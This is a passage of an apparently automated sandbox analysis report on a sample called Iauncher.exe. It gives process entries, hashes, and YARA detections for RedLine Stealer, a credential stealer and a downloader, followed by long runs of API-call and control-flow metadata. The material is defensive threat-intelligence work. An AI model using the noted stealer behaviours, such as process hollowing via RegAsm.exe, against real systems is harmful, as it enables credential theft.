                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:20:35:50
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                                                                                                                                                  Imagebase:0x560000
                                                                                                                                                  File size:505'344 bytes
                                                                                                                                                  MD5 hash:D79977A15EB010C637CF9078B4EB82C8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:20:35:50
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:20:35:50
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true


                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:12.1%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:87%
                                                                                                                                                    Signature Coverage:8%
                                                                                                                                                    Total number of Nodes:300
                                                                                                                                                    Total number of Limit Nodes:34
78107 75e02b1 78106->78107 78108 75e02d3 78107->78108 78110 5dbac28 3 API calls 78107->78110 78111 5dba520 3 API calls 78107->78111 78109 75e0334 78110->78109 78111->78109

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 'Aq$$Aq
                                                                                                                                                    • API String ID: 0-3116551248
                                                                                                                                                    • Opcode ID: 05a283c120ab1e941c7987f2dfbdc661f42e2346b2bb5a97085f4b61c3089a72
                                                                                                                                                    • Instruction ID: 177abbd00fb1a543ff8fb609a706247fa7a415d56be59c823621d688da39ab2a
                                                                                                                                                    • Opcode Fuzzy Hash: 05a283c120ab1e941c7987f2dfbdc661f42e2346b2bb5a97085f4b61c3089a72
                                                                                                                                                    • Instruction Fuzzy Hash: 84047078905229CFCB25DF64D888AD9B7B1FF49305F1485EAE909A7361DB31AE81CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d$d$d$d$d$d
                                                                                                                                                    • API String ID: 0-3846220497
                                                                                                                                                    • Opcode ID: 7fb12373f329d5528b1197b57577b39ffea3f37e970ae274741d20f62c7e2da3
                                                                                                                                                    • Instruction ID: 505454eb53f8dc7560361079d1a07edb6a0b6264415de5a9fe3503ce0ea1c545
                                                                                                                                                    • Opcode Fuzzy Hash: 7fb12373f329d5528b1197b57577b39ffea3f37e970ae274741d20f62c7e2da3
                                                                                                                                                    • Instruction Fuzzy Hash: 76E2D335900A299FCB22DF64CC54BDABBB2FF4A305F0591E5E509AB261DB319E95CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hq$Hq$Hq$Hq$Hq
                                                                                                                                                    • API String ID: 0-3799487529
                                                                                                                                                    • Opcode ID: c7f553cdb7ef919d2ee9618bcc6d8eeaa189a41ebf2cb60bcf02728004752cee
                                                                                                                                                    • Instruction ID: 737f3291b55811f933b89279f8538ab5d432d9539ef9d0f501db5da8f357927d
                                                                                                                                                    • Opcode Fuzzy Hash: c7f553cdb7ef919d2ee9618bcc6d8eeaa189a41ebf2cb60bcf02728004752cee
                                                                                                                                                    • Instruction Fuzzy Hash: 3C325F70A00218CFEB54DF68C9917AEBBF3FF88300F14816AD44AAB255DB749D45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b53c704869a10c09617f400d5c125f022e5773f9c47114b3920caf55d241ece9
                                                                                                                                                    • Instruction ID: afbf44a6800679adc18ae38d7201132353cb2916ce0d3e7098f3deeab722d320
                                                                                                                                                    • Opcode Fuzzy Hash: b53c704869a10c09617f400d5c125f022e5773f9c47114b3920caf55d241ece9
                                                                                                                                                    • Instruction Fuzzy Hash: AA53BB75E016298FCB21DF24C994B99B7B2BF8A305F0091EAD50DB7260EB716E85CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f5cc776801635e3d8171ada83d88242441ef9edcffbe64a30b3586e8d6f9f0b2
                                                                                                                                                    • Instruction ID: 0612db606e613854cb3311f87cdcd32e93865a88bf458ea15a99187eb4ee2620
                                                                                                                                                    • Opcode Fuzzy Hash: f5cc776801635e3d8171ada83d88242441ef9edcffbe64a30b3586e8d6f9f0b2
                                                                                                                                                    • Instruction Fuzzy Hash: AA23CE75A006298FCB21EF24DD54B99B7B2FF8A301F0091EAD54DA7260EB716E85CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5048bc7bbde0ad80d76d0a723ff237546664a5cde5d9ea5a9d931d09a257165d
                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 2154 101f840-101f8cf GetCurrentProcess 2158 101f8d1-101f8d7 2154->2158 2159 101f8d8-101f90c GetCurrentThread 2154->2159 2158->2159 2160 101f915-101f949 GetCurrentProcess 2159->2160 2161 101f90e-101f914 2159->2161 2162 101f952-101f96a 2160->2162 2163 101f94b-101f951 2160->2163 2161->2160 2167 101f973-101f9a2 GetCurrentThreadId 2162->2167 2163->2162 2168 101f9a4-101f9aa 2167->2168 2169 101f9ab-101fa0d 2167->2169 2168->2169
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0101F8BE
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0101F8FB
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0101F938
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0101F991
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                    • Opcode ID: a87a6d444550eb153e9e0d0582f07509e1dbc25deedebb6b2415b53ef390c40e
                                                                                                                                                    • Instruction ID: c653584ab5ff43b09e1573b5fb08bc965caf55691b1b079148c7a4fe838083e8
                                                                                                                                                    • Opcode Fuzzy Hash: a87a6d444550eb153e9e0d0582f07509e1dbc25deedebb6b2415b53ef390c40e
                                                                                                                                                    • Instruction Fuzzy Hash: 045154B0D0030A8FEB14DFAAD548BAEBBF1FB48314F208459E419A7390DB746945CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q$(q
                                                                                                                                                    • API String ID: 0-2485164810
                                                                                                                                                    • Opcode ID: 367f66badb3020ddc8225de764e465a82bd62a2b416b84ced4e50a335fec6de4
                                                                                                                                                    • Instruction ID: dfed0a18221f30155aa154f658ebebcbddb1fa0592c47b395258fbe0056c238f
                                                                                                                                                    • Opcode Fuzzy Hash: 367f66badb3020ddc8225de764e465a82bd62a2b416b84ced4e50a335fec6de4
                                                                                                                                                    • Instruction Fuzzy Hash: 4591B031E003059FDB04ABA9D854BAEBBB6FFC8300F148169E519AB391DF349D41CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q$(q
                                                                                                                                                    • API String ID: 0-2485164810
                                                                                                                                                    • Opcode ID: 5612c1133b2864378d91e69bff233a7a8c27fe67895456a4705f4711b9607f91
                                                                                                                                                    • Instruction ID: be81cde1cb29fecd1216635c6755da13d1929f1fb54ff0b1fc288bff380e99fe
                                                                                                                                                    • Opcode Fuzzy Hash: 5612c1133b2864378d91e69bff233a7a8c27fe67895456a4705f4711b9607f91
                                                                                                                                                    • Instruction Fuzzy Hash: 68610471E002099FDF14DFA9E884AEEBBF1FF88310F50812AE919A3250D7359951CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03A1411C,02A5D8EC,?,00000000), ref: 05D63EA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3683984827.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d60000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: c601245b380f2fa4e2575c7b07c74cfb1fdab0009310bb0d8fdefd6db07ee908
                                                                                                                                                    • Instruction ID: d61f8d7f7a4ba9985220190b8ed45eaa696b7ed4d8372267b4da7986375aa8ef
                                                                                                                                                    • Opcode Fuzzy Hash: c601245b380f2fa4e2575c7b07c74cfb1fdab0009310bb0d8fdefd6db07ee908
                                                                                                                                                    • Instruction Fuzzy Hash: F0719E74A01208AFCB15DFA9D884DAEBBB6FF49714F114499F901AB361DB31EC82CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Focus
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2734777837-0
                                                                                                                                                    • Opcode ID: d6183e301a455574beb2404a13effa13d05449fb76f8ba47974bfd93438bc503
                                                                                                                                                    • Instruction ID: bf2ef3b2aa322359e4028ed5317cd435a3e5ca2481bf460d805c919e35c89970
                                                                                                                                                    • Opcode Fuzzy Hash: d6183e301a455574beb2404a13effa13d05449fb76f8ba47974bfd93438bc503
                                                                                                                                                    • Instruction Fuzzy Hash: A1317AB1E002168FDB18EF69D444AFEBBB9BF48611F15445AD815EB355DB34EC01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01017469
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: bf6dc7c5dc47d3a0e881959e75ea3dc84fd5efafc6721c49340185221b8fef51
                                                                                                                                                    • Instruction ID: ba9447b118c95c6f5f5417b9894b81f0adfcfda7ebbde1cd0e01013c589a0c96
                                                                                                                                                    • Opcode Fuzzy Hash: bf6dc7c5dc47d3a0e881959e75ea3dc84fd5efafc6721c49340185221b8fef51
                                                                                                                                                    • Instruction Fuzzy Hash: CC410271C00719CBEB24DFA9C844BDDBBF1BF88304F20816AD448AB295DB755946CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01017469
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 0161f7c77dbd1677a06d753b0008c2a65ff66c9d39e09ac1f5f1d5279bbbba53
                                                                                                                                                    • Instruction ID: 98347374e063b1c7072dd2d6e1817d5f00855763859e9e650d4b685d8ba08d8f
                                                                                                                                                    • Opcode Fuzzy Hash: 0161f7c77dbd1677a06d753b0008c2a65ff66c9d39e09ac1f5f1d5279bbbba53
                                                                                                                                                    • Instruction Fuzzy Hash: FE41E471C0071DCBEB24DFA9C844B9EBBF5BF48304F20816AD508AB255DB756946CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    • Opcode ID: b7fa2d832575b044f8e38354fb931d78b39dff0aba1670943cbe63a1f393b697
                                                                                                                                                    • Instruction ID: 9a7ca8ad365ab94b3c63244b5eae32b771c349d5b205728ce2fd3c48370b475f
                                                                                                                                                    • Opcode Fuzzy Hash: b7fa2d832575b044f8e38354fb931d78b39dff0aba1670943cbe63a1f393b697
                                                                                                                                                    • Instruction Fuzzy Hash: 7231A7729003899FDB11DFA9C840AEEBFF9EF09320F14805AE954EB221C3359951CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,075EF6E7,00000000,03A1411C,02A5D8EC,00000000,?), ref: 075EFD75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: a6833775a9e7c69cf0ce64919b6f357f532d16954a10eba4529742d647e49c22
                                                                                                                                                    • Instruction ID: 76e5e8c06c6176dc1cd70a92db169a5a774d4fad0a046aece9b652106d739e3b
                                                                                                                                                    • Opcode Fuzzy Hash: a6833775a9e7c69cf0ce64919b6f357f532d16954a10eba4529742d647e49c22
                                                                                                                                                    • Instruction Fuzzy Hash: 7F31EEB2C043898FDB10DFA9D981BEEBFF8FB49320F04846AD050A7251C3749509CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Focus
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2734777837-0
                                                                                                                                                    • Opcode ID: 57bcb65023ed45aedb066953d1f82f12a6f5dd76fe1903dff2dee5182ffe391b
                                                                                                                                                    • Instruction ID: 19441e8209a41f06553334ea3cc95f658d2ddfb3526375ae6a1aca6be6e1c3c0
                                                                                                                                                    • Opcode Fuzzy Hash: 57bcb65023ed45aedb066953d1f82f12a6f5dd76fe1903dff2dee5182ffe391b
                                                                                                                                                    • Instruction Fuzzy Hash: AB2168B5E0035A8FCB14DF65D444BEEBBB9FB09621F1485AAD818A7301C735A840CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05D8AC1F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684118323.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d80000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DrawText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2175133113-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 05DB126A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: TextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 530164218-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05D8AC1F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684118323.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d80000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DrawText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2175133113-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 05DBC46F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FromMonitorPoint
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1566494148-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 05DB135C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassInfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3534257612-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0101FB0F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 05DB135C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassInfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3534257612-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05DBB57A,?,?,?,?,?), ref: 05DBB61F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,075EF65A,00000000,00000000,03A1411C,02A5D8EC), ref: 075EFAA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePeek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2222842502-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0101D881,00000800,00000000,00000000), ref: 0101DA92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 075EA845
